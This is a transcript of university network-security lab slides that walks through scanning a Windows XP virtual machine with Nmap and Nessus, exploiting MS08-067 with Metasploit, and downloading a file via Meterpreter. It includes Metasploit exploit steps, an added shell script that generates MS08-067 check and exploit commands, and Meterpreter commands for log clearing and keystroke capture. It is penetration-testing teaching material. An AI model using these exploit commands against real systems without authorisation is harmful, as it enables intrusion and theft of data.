Laboratory exercise - Network security - Penetration testing
Transcript of Laboratory exercise - Network security - Penetration testing
Computer Network Security - Laboratory exercise
Adrian Furtună
M.Sc. C|EH
Aim of the exercise
Demonstrate a computer attack using open-source tools: download locally the file secrets.txt located on the desktop of the victim machine by exploiting one of its vulnerabilities.
Walking through the stages of an attack*:
1. Reconnaissance - (not exercised here)
2. Scanning and enumeration - Nmap, Nessus
3. Gaining access - Metasploit
4. Privilege escalation - (not exercised here)
5. Maintaining access - (not exercised here)
6. Covering tracks and installing backdoors - (not exercised here)
* according to the Certified Ethical Hacker (EC-Council) course material
Lab preparation (30 min)
Download and install the following tools:
  nmap-5.00-setup.exe (http://nmap.org)
  Nessus-4.0.2-i386.msi (http://www.nessus.org)
  framework-3.3.3.exe (http://www.metasploit.org)
Update the Nessus plugins:
  "Obtain an activation code" (home feed)
  "Register" (after registration the plugin update starts automatically)
Preparing the victim:
  Download locally and unpack the archive: winxp_SP2_strip.zip
  Start the virtual machine: Windows XP Professional.vmx
  Log in: (user: user, pass: user)
Connectivity check (private network, Host <-> Guest): ping from the Host to the Guest and from the Guest to the Host
Disclaimer - Ethical Hacking / Penetration Testing
Actions similar to those of an attacker/hacker, but with an ethical purpose:
  Discovering vulnerabilities
  Proposing corrective measures
  No destructive or unapproved actions
  Proactive, preventive activity
What we will practice...
1. Scanning with Nmap
   Open ports
   Versions of the exposed services
   Operating system version
2. Scanning with Nessus
   Automated search for vulnerabilities in the services found in step 1
3. Exploiting a vulnerability with Metasploit
   Gaining access to the target system
Target of the attack (the victim)
  Operating system: ????? (to be determined by scanning)
  Exposed services: ????? (to be determined by scanning)
  Vulnerabilities: ????? (to be determined by scanning)
  Virtual machine (VMware)
  Firewall ON/OFF
  No antivirus
Scanning with Nmap (1) - http://insecure.org
nmap -h [fragments]
HOST DISCOVERY:
  -sP: Ping Scan - go no further than determining if host is online
  -PN: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
  -F: Fast mode - Scan fewer ports than the default scan
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
OS DETECTION:
  -O: Enable OS detection
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
Scanning with Nmap (2)
nmap -sS -sV -O -F -n 10.0.40.69

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time
Nmap scan report for 10.254.40.69
Host is up (0.00011s latency).
Not shown: 98 filtered ports
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:86:DF:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)
Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds

Reading the result: with -F Nmap probes the 100 most common ports; 2 are open and the other 98 are filtered (dropped, not refused), so there is no closed port for the OS fingerprint to use and the OS match is only a guess. That profile is consistent with a Windows XP SP2 host whose firewall is on but allows file and printer sharing (139/tcp and 445/tcp). The -sV banner on 445/tcp ("Microsoft Windows XP microsoft-ds") is the stronger hint about the target, and it is the service the Nessus and Metasploit steps below work against.
Scanning with Nessus (1) - http://www.nessus.org
Nessus Server Manager -> Start Nessus Server
Nessus Client
  Connect - the client connects to the server
  + Networks to scan - enter the IP address of the target machine
  + Select a scan policy - create a new scan policy
    Plugin Selection -> Disable All -> Plugin Selection -> Windows (enable only the Windows plugins; the MS08-067 check belongs to this family, so the restricted policy still finds it and the scan runs much faster)
  Scan Now - starts the scan
  Export - saves the resulting report
Scanning with Nessus (2) - http://www.nessus.org [slide content not captured in the transcript]
Gaining access - Metasploit (1)
Metasploit architecture
  Interfaces: Metasploit Console, Metasploit Web
  Modules:
    Exploits - exploit a vulnerability and deliver a payload
    Auxiliaries - port scanning, DoS, fuzzing, etc.
    Payloads - encapsulate arbitrary code (shellcode) that is executed after a successful exploit
    Nops - generate NOP instructions (NOP sleds) of arbitrary size
Tutorial: http://www.offensive-security.com/metasploit-unleashed/
Gaining access - Metasploit (2) - http://www.metasploit.org
We exploit the MS08-067 vulnerability (the Server service flaw exploited by the Conficker/Kido/Downadup worm)
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
  Start Metasploit Web
  Exploits -> Search [ms08-067]
  Set TARGET - Windows XP SP2 English
  Set PAYLOAD - windows/meterpreter/bind_tcp (or reverse_tcp)
  Set OPTIONS - RHOST (the victim's IP address)
  Exploit
Two things to check before clicking Exploit: the TARGET must match the victim's OS, service pack and language, because a wrong return address does not just fail, it crashes the victim's Server service and usually forces a reboot before another attempt can work; and the payload choice decides who connects to whom: bind_tcp opens a listening port on the victim, which the victim's firewall must allow, while reverse_tcp connects back to the attacker and therefore also needs LHOST set to the attacking machine's address.
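The Nmap scan above tells you which hosts expose 445/tcp; whether they are actually vulnerable to MS08-067 is a separate question that Nessus, or the Metasploit module's own "check" command, answers. The script below is an added example, not part of the original lab: it parses Nmap grepable (-oG) output, picks the hosts with 445/tcp open, and writes an msfconsole resource script that runs the check against each of them, leaving the exploit itself as the manual, per-host step the slides describe. The module path exploit/windows/smb/ms08_067_netapi and the check command are Metasploit's own; the grepable scan data is constructed to match the report on the slides (10.0.40.69) plus two invented hosts for contrast, and the rc file name is my choice.

```shell
#!/bin/sh
# Added example, not part of the original lab material.
# Pipeline: Nmap -oG output -> hosts with 445/tcp open -> Metasploit resource
# script that runs the MS08-067 "check" on each host. No "exploit" is issued
# automatically: a wrong TARGET crashes the victim's Server service.
#
# Assumptions (mine, not from the slides):
#   - the scan is re-run with grepable output, e.g.
#       nmap -sS -sV -O -F -n -oG scan.gnmap 10.0.40.0/24
#   - the sample below is CONSTRUCTED: 10.0.40.69 mirrors the slide's report,
#     10.0.40.70 and 10.0.40.71 are invented to show the filtering.

# Constructed sample of Nmap grepable output. Fields are tab-separated; each
# port entry is port/state/proto/owner/service/rpcinfo/version/.
sample_gnmap() {
    printf '%s\n' '# Nmap 5.10BETA1 scan initiated Mon Jan 04 17:20:00 2010 as: nmap -sS -sV -O -F -n -oG scan.gnmap 10.0.40.0/24'
    printf 'Host: %s ()\tPorts: %s\tIgnored State: filtered (98)\tOS: %s\n' \
        10.0.40.69 '139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/' 'Microsoft Windows XP SP2'
    printf 'Host: %s ()\tPorts: %s\tIgnored State: closed (98)\tOS: %s\n' \
        10.0.40.70 '22/open/tcp//ssh//OpenSSH 5.1p1/, 445/filtered/tcp//microsoft-ds///' 'Linux 2.6.X'
    printf 'Host: %s ()\tPorts: %s\tIgnored State: closed (98)\tOS: %s\n' \
        10.0.40.71 '445/open/tcp//microsoft-ds//Microsoft Windows 7 microsoft-ds/' 'Microsoft Windows 7'
    printf '%s\n' '# Nmap done at Mon Jan 04 17:20:14 2010 -- 3 IP addresses (3 hosts up) scanned in 13.52 seconds'
}

# Read grepable output on stdin; print one IP per line for every host whose
# 445/tcp is "open" (filtered and closed are skipped). Port state is all Nmap
# knows; vulnerability is decided later by the Metasploit check.
smb_candidates() {
    awk 'BEGIN { FS = "\t" }
        /^Host: / {
            split($1, h, " "); ip = h[2]
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, entry, ", ")
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    if (f[1] == "445" && f[2] == "open" && f[3] == "tcp") print ip
                }
            }
        }'
}

# Emit an msfconsole resource script (one console command per line) that
# loads the MS08-067 module and runs "check" against each candidate host.
ms08_067_check_rc() {
    echo "use exploit/windows/smb/ms08_067_netapi"
    for rhost in "$@"; do
        echo "set RHOST $rhost"
        echo "check"
    done
}

# Console equivalent of the lab's Metasploit Web steps, for ONE host that the
# check reported as vulnerable. $2 is the target index from "show targets"
# (0 = Automatic Targeting; the lab picks the "Windows XP SP2 English" entry).
ms08_067_exploit_cmds() {
    rhost=$1
    target=${2:-0}
    echo "use exploit/windows/smb/ms08_067_netapi"
    echo "set RHOST $rhost"
    echo "set TARGET $target"
    echo "set PAYLOAD windows/meterpreter/bind_tcp"
    echo "exploit"
}

# Usage: redirect the output to a file and run it, e.g.
#   sh triage.sh > ms08_067_check.rc && msfconsole -r ms08_067_check.rc
candidates=$(sample_gnmap | smb_candidates)
ms08_067_check_rc $candidates
```

With a real scan, replace `sample_gnmap` by `cat scan.gnmap`. The 10.0.40.71 host shows why the check pass matters: 445/tcp is open there too, so Nmap alone would put it on the list, but the check (like the Nessus plugin) is what separates "runs SMB" from "vulnerable to MS08-067".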
Gaining access - Metasploit (3) - http://www.metasploit.org [slide content not captured in the transcript]
Gaining access - Metasploit (4) - http://www.metasploit.org
Meterpreter help [fragments]

Stdapi: System Commands
    Command        Description
    -------        -----------
    clearev        Clear the event log
    execute        Execute a command
    kill           Terminate a process
    ps             List running processes
    reboot         Reboots the remote computer
    shell          Drop into a system command shell
    sysinfo        Gets information about the remote system, such as OS

Stdapi: User interface Commands
    Command        Description
    -------        -----------
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes

Stdapi: File system Commands
    Command        Description
    -------        -----------
    cat            Read the contents of a file to the screen
    cd             Change directory
    del            Delete the specified file
    download       Download a file or directory
    edit           Edit a file
    getlwd         Print local working directory
    getwd          Print working directory
    lcd            Change local working directory
    lpwd           Print local working directory
    ls             List files
    mkdir          Make directory
    pwd            Print working directory
    rm             Delete the specified file
    rmdir          Remove directory
    upload         Upload a file or directory
Completing the objective of the exercise
Download locally the file secrets.txt located on the desktop of the victim machine by exploiting one of its vulnerabilities.
Meterpreter:
  pwd
  cd Desktop
  ls
  download secrets.txt
Note: MS08-067 lands in the Server service, so the session runs as SYSTEM and pwd typically prints that service's working directory (C:\WINDOWS\system32), not a user profile. "cd Desktop" therefore only works after moving to the right profile first; on Windows XP the desktop of the lab account is C:\Documents and Settings\user\Desktop, which Meterpreter expects quoted and with doubled backslashes, e.g. cd "C:\\Documents and Settings\\user\\Desktop". The downloaded file is written to the local working directory shown by lpwd (change it with lcd if needed).
The End
Thank you!
Adrian Furtună, M.Sc. C|EH, [email protected]
? QUESTIONS ?